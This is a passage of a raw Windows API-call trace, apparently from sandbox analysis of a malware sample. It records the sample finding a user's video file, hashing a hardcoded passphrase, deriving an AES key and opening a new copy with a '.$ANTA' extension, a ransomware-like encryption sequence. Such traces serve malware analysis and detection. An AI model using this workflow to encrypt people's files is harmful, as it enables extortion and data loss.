hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0099.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0099.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca118 | out: hHeap=0x1780000) returned 1 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca118 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24a0 [0099.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ed8 | out: hHeap=0x1780000) returned 1 [0099.737] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24a0 | out: hHeap=0x1780000) returned 1 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0099.737] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ed8 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9f38 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0099.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0099.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0099.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0099.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0099.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0099.738] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0099.738] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0099.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0099.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0099.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0099.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0099.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0099.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0099.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0099.739] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv", lpFindFileData=0x144ead0 | out: lpFindFileData=0x144ead0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6aad530, ftCreationTime.dwHighDateTime=0x1d5e8f3, ftLastAccessTime.dwLowDateTime=0x75221700, ftLastAccessTime.dwHighDateTime=0x1d5e90e, ftLastWriteTime.dwLowDateTime=0x75221700, ftLastWriteTime.dwHighDateTime=0x1d5e90e, nFileSizeHigh=0x0, nFileSizeLow=0xde93, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="oxSznFWHwYcj-6Y.mkv", cAlternateFileName="OXSZNF~1.MKV")) returned 0x41ac500 [0099.739] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0099.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0099.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0099.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0099.739] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.739] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca358 | out: hHeap=0x1780000) returned 1 [0099.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0099.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0099.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0099.740] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0099.740] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0099.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf888 | out: hHeap=0x1780000) returned 1 [0099.740] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0099.740] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1f0 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0099.741] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0099.741] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ab8 | out: hHeap=0x1780000) returned 1 [0099.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1d8 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0099.741] PeekMessageW (in: lpMsg=0x144ea0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ea0c) returned 0 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0099.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0099.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0099.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0099.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0099.741] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0099.741] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0099.742] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0099.742] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0099.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0099.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0099.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0099.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0099.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0099.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0099.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0099.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0099.743] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0099.743] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.743] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0099.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797108, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0099.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.743] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796f08, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0099.744] CryptAcquireContextA (in: phProv=0x144e7b0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e7b0*=0x41a5360) returned 1 [0099.805] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0099.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0099.805] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0099.805] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0099.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.805] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0099.805] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.805] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0099.805] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.805] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0099.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43ca718, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0099.806] CryptCreateHash (in: hProv=0x41a5360, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e520 | out: phHash=0x144e520) returned 1 [0099.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0099.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0099.806] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0099.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0099.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2b48, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0099.806] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.806] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.806] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca778, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0099.806] CryptHashData (hHash=0x41ac140, pbData=0x17e2bd8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0099.806] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.806] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0099.811] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0099.811] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca6e8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0099.811] CryptDeriveKey (in: hProv=0x41a5360, Algid=0x6610, hBaseData=0x41ac140, dwFlags=0x1, phKey=0x144e520 | out: phKey=0x144e520*=0x41ac6c0) returned 1 [0099.812] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ea8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0099.812] CryptDestroyHash (hHash=0x41ac140) returned 1 [0099.812] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\oxsznfwhwycj-6y.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0099.812] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0099.812] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0099.812] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0099.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0099.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0099.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a450 | out: hHeap=0x1780000) returned 1 [0099.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0099.813] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0099.813] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\oxSznFWHwYcj-6Y.mkv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\oxsznfwhwycj-6y.mkv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2b0 | out: hHeap=0x1780000) returned 1 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0099.814] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0099.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0099.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0099.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0099.814] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.814] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0099.814] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0099.814] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0099.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0099.814] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0099.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0099.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0099.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0099.815] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0099.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0099.815] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0099.815] HeapFree (in: hHeap=0x1780000, 